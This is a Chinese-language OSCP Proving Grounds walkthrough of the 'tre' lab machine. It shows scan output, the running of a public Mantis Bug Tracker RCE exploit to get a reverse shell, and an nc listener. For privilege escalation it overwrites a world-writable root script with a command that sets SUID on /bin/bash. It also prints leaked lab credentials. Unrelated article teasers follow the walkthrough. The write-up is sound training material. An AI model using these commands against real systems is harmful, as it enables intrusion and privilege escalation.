OSCP - Proving Grounds - tre

主要知識點

  • 突破邊界的方法比較多樣
  • 觀察pspy64的檢測結果

具體步驟

依舊nmap掃描開始,開放了80,8082,22端口

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 03:39 UTC
Nmap scan report for 192.168.56.84
Host is up (0.00083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
|   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open  http    nginx 1.14.2
|_http-title: Tre
|_http-server-header: nginx/1.14.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

其中80端口會提供比較多的信息,隱藏路徑還真不少

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.117.84/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   502,404,429,503,400
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/cms                  (Status: 301) [Size: 314] [--> http://192.168.117.84/cms/]
/mantisbt             (Status: 301) [Size: 319] [--> http://192.168.117.84/mantisbt/]
/server-status        (Status: 403) [Size: 279]
/system               (Status: 401) [Size: 461]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

其中mantisbt, 搜索一下有一個RCE漏洞,不過目前沒有拿到版本信息,只能抱著試試看的想法試試

C:\home\kali\Documents\OFFSEC\play\Tre> searchsploit -m 48818          Exploit: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)URL: https://www.exploit-db.com/exploits/48818Path: /usr/share/exploitdb/exploits/php/webapps/48818.pyCodes: CVE-2019-15715, CVE-2017-7615Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Documents/OFFSEC/play/Tre/48818.pyC:\home\kali\Documents\OFFSEC\play\Tre> python2 48818.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up

在本地的nc -nlvp 80則會收到reverse shell

C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 38846
bash: cannot set terminal process group (569): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tre:/var/www/html/mantisbt$ 

調用pspy64來觀察,發現基本上每秒鐘都會執行一次,且我們對于這個 /usr/bin/check-system有寫權限

2024/12/16 07:47:15 CMD: UID=0    PID=1434   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:16 CMD: UID=0    PID=1436   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:17 CMD: UID=0    PID=1437   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:18 CMD: UID=0    PID=1438   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:19 CMD: UID=0    PID=1439   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:20 CMD: UID=0    PID=1440   | /bin/bash /usr/bin/check-system 
2024/12/16 07:47:21 CMD: UID=0    PID=1441   | /bin/bash /usr/bin/check-system ......
......www-data@tre:/var/www/html/mantisbt$ ls -l /usr/bin/check-system
ls -l /usr/bin/check-system
-rw----rw- 1 root root 135 May 12  2020 /usr/bin/check-systemwww-data@tre:/var/www/html/mantisbt$ cat /usr/bin/check-system
cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p infowhile :
do
echo "Checking...";
sleep 1;
done

直接覆蓋掉,賦予/bin/bash SUID權限,但是發現不成功,懷疑是該腳本循環執行,即使更改文件也無法立刻生效

echo "chmod +s /bin/bash" > /usr/bin/check-system
cat /usr/bin/check-system
chmod +s /bin/bash

?

上傳并執行linpeas.sh,發現一個有趣的文件?/var/www/html/mantisbt/config/config_inc.php,其中包括數據庫的用戶名和密碼,但是無法從命令行登錄

?

$g_hostname               = 'localhost';
$g_db_type                = 'mysqli';
$g_database_name          = 'mantis';
$g_db_username            = 'mantissuser';
$g_db_password            = 'password@123AS';

繼續搜索,發現了一個adminer.php,這個文件在路徑爆破的時候沒有發現,應該是字典問題

drwxr-xr-x 16 www-data www-data  12288 Apr  1  2017 mantisbt
-rw-r--r--  1 www-data www-data 227984 Oct 24  2017 file.jpg
drwxr-xr-x  3 root     root       4096 May 12  2020 ..
-rw-r--r--  1 www-data www-data    164 May 12  2020 index.html
-rw-r--r--  1 root     root         20 May 12  2020 info.php
drwxr-xr-x 16 root     root      12288 May 12  2020 system
-rw-r--r--  1 root     root     489307 May 12  2020 adminer.php
drwxr-xr-x  5 www-data www-data   4096 May 12  2020 .
drwxr-xr-x  9 www-data www-data   4096 May 12  2020 cms
pwd
/var/www/html

訪問一下,是一個mysql 的web UI,用發現的mantissuser/password@123AS來登錄,成功,其中mantis_user_table中的tre行對應的realname好像是一個密碼,而恰好remote server有一個tre的用戶

嘗試su tre,成功,并且發現了該用戶可以重啟服務器

www-data@tre:/tmp$ su tre
su tre
Password: Tr3@123456A!id
uid=1000(tre) gid=1000(tre) groups=1000(tre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
sudo -l
Matching Defaults entries for tre on tre:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser tre may run the following commands on tre:(ALL) NOPASSWD: /sbin/shutdown

?

也許我們可以重啟服務器后再看/usr/bin/check-system的改動會不會生效

sudo /sbin/shutdown -r
Shutdown scheduled for Mon 2024-12-16 08:03:36 EST, use 'shutdown -c' to cancel.Session terminated, killing shell... ...killed.
bash: [1497: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@tre:/var/www/html/mantisbt$ exit

等服務器重啟好以后,按照相同的步驟重新創建reverse shell,提權成功

C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 37042
bash: cannot set terminal process group (508): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
bash-5.0$ /bin/bash -p
/bin/bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cat /root/proof.txt
22f5d43e241d15a25e6d1eae87510c31

?

?

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/87196.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/87196.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/87196.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【Mars3d】支持的basemaps數組與layers數組的坐標系列舉

問題場景: basemap 是epsg4326的。,layer 圖層是 epsg 4450的。可以在一個頁面中展示嗎? 回復: 可以不同坐標系疊加,但layer 圖層是 epsg 4450的只支持arcgis動態服務,其他情況的不支持 wmts只支持3個坐標…

【算法】509. 斐波那契數

509. 斐波那契數 簡單 相關標簽 premium lock icon 相關企業 斐波那契數 (通常用 F(n) 表示)形成的序列稱為 斐波那契數列 。該數列由 0 和 1 開始,后面的每一項數字都是前面兩項數字的和。也就是: F(0) 0,F(1) 1 …

FOC學習筆記(5)內嵌式電機與表貼式電機的區別

1. 引言 在現代電機設計中,永磁同步電機(Permanent Magnet Synchronous Motor, PMSM)因其高效率、高功率密度和優異的動態性能,在工業、新能源汽車、航空航天等領域得到廣泛應用。根據永磁體在轉子中的安裝方式不同,永…

算法 按位運算

按位與(Bitwise AND)和按位異或(Bitwise XOR) 按位與(&) 按位與是對兩個數的二進制表示的每一位進行邏輯與操作。 規則:兩個對應位都為1時,結果位才為1,否則為0。…

python3GUI--基于PyQt5+SQLite3的網址審核系統(詳細圖文)

文章目錄 一.前言二.相關知識1.PyQt52.sqlite3 三.效果預覽1.登錄2.注冊3.普通用戶身份權限4.管理員身份權限 三、技術討論1.數據展示表格1. 更強的表現力和交互性(前端功能豐富)2. 數據處理效率更高(支持大…

與后端現場聯調mock數據

當我們后端在現場沒辦法連后端本地就可以使用mock數據,模擬后端返回數據。使用工具:apifox 一、安裝好以后--新建接口 舉個栗子: 我想建個接口http://123.123.123.123:8080/api/login 二、 新建期望,返回固定值,否則…

C# 事件(發布者和訂閱者)

發布者和訂閱者 很多程序都有一個共同的需求,即當一個特定的程序事件發生時,程序的其他部分可以得到 該事件已經發生的通知。 發布者/訂閱者模式(publisher/subscriber pattem)可以滿足這種需求。在這種模式中,發布 …

RediSearch高性能全文搜索引擎

RediSearch 是 RedisLabs 團隊開發的一個高性能全文搜索引擎,可作為一個 Redis Module 運行在 Redis 上。 Redis7:百萬數據級Redis Search 超越 ElasticSearch Redis Search是基于Redis的全文搜索引擎模塊(RediSearch)&#xff0c…

菜譜大全——字符串處理藝術:從文本解析到高效搜索 [特殊字符][特殊字符]

目錄 前言一、現實場景二、技術映射2.1 基礎刀工:String類2.2 高效剁餡:StringBuilder2.3 精準雕刻:正則表達式 三、知識點呈現3.1 String vs StringBuilder vs StringBuffer3.2 正則表達式核心語法速查3.3 字符串拼接性能陷阱 四、代碼實現五…

webpack+vite前端構建工具 -答疑

webpack答疑 1 輸入webpack命令,執行的是全局版本還是本地版本的webpack 當在命令行窗口輸入webpack命令時,其執行優先級可通過以下步驟明確判斷: 1.1 【全局安裝優先機制】 執行原理:系統會按照環境變量PATH的順序逐級查找可執…

API接口開放平臺 Crabc 3.4 發布

Crabc 是一款 API 接口開發平臺,企業級接口管理、SQL2API 平臺。支持動態數據源、動態 SQL 和標簽, 支持接入(mysql、oracle、達夢、TiDB、hive、es 和 mongodb)等 SQL 或 NoSQL 數據源,在線可視化編寫 SQL 快速發布接…

PD快充協議芯片XSP04D支持全協議+支持串口通訊+支持與主板共用一個Type-C

隨著Type-C接口的充電器普及,市面上的PD充電器越來越多,小家電產品可不配充電器,使用Type-C接口,然后加入一顆PD協議取電協議芯片XSP08即可讓充電器/充電寶/車充等電源輸出9V/12V/15V/20V電壓給產品供電。 針對各種各樣的不同需求…

C# 高效加載txt文件內容

在 C# 中,高效加載 TXT 文件內容可以通過多種方法實現,具體方法的選擇取決于文件的大小和讀取需求。以下是一些常用的方法: 1. 使用 File.ReadAllText 如果文件比較小,并且你希望一行一行地讀取整個內容,可以使用 Fi…

(2)pytest執行用例的規則

1. 簡介 今天主要學習一下pytest的執行用例的規則。 2. 通過help幫助查看pytest如何使用 .查看pytest命令行參數,可以用pytest -h 或pytest --help查看 3. 用例設計原則 文件名以test_*.py文件和*_test.py以test_開頭的函數以Test開頭的類以test_開頭的方法所有的…

InnoDB數據頁

導讀: 我們已經知道了頁是數據庫存儲的基本單位,知道了一條行記錄的存儲格式是怎樣的,當數據越來越多時,那一條條行記錄具體又是怎么在頁中被組織起來的呢? 一、InnoDB數據頁結構 二、總結 1、一條條行數據是如何在數…

世賽背景下,中職物聯網應用與服務賽項實訓解決方案

一、世賽背景與物聯網應用賽項概述 1.1 世賽發展歷程及對中職教育的影響 世界技能大賽(WorldSkills Competition,簡稱世賽)自1950年創立以來,已經成為全球范圍內展示職業技能水平的重要賽事。截至2024年,世賽已成功舉…

【攻防篇】解決:阿里云docker 容器中自動啟動xmrig挖礦-- 實戰

文章目錄 場景一、問題二、原因三、解決方案1、控制臺處理2、 [清除與防護](https://blog.csdn.net/ladymorgana/article/details/148921668?spm1001.2014.3001.5501)1. 緊急處理:停止挖礦進程2. 清理被感染的容器3. 防護措施:防止再次被入侵4. 排查入侵…

飛算智造JavaAI:智能編程革命——AI重構Java開發新范式

文章目錄 引言:當傳統Java開發遇上AI一、技術架構解析1.1 核心架構圖1.2 關鍵技術棧 二、實戰演示:從需求到代碼的全AI輔助2.1 場景:電商優惠券系統開發2.2 代碼生成實例2.3 智能調試演示 三、與傳統開發模式對比測試3.1 基準測試數據3.2 典型…

[特殊字符] 分享裂變新姿勢:用 UniApp + Vue3 玩轉小程序頁面分享跳轉!

在如今流量成本日益攀升的移動互聯網時代,"用戶分享拉新" 成為了增長的重要策略。而微信小程序作為天然具備社交傳播力的平臺,提供了較完善的分享機制支持。本文將從實戰角度出發,手把手教你如何使用 uni-app Vue3 構建一個支持「…

[創業之路-458]:企業經營層 - 藍海戰略 - 重構價值曲線、整合產業要素、創造新需求

“重構價值曲線、整合產業要素、創造新需求”是藍海戰略中實現價值創新的核心路徑,它們構成了一個從內部優化到外部協同,再到市場顛覆的完整邏輯鏈條。以下從理論框架、實踐方法和企業案例三個維度展開分析: 一、重構價值曲線:打…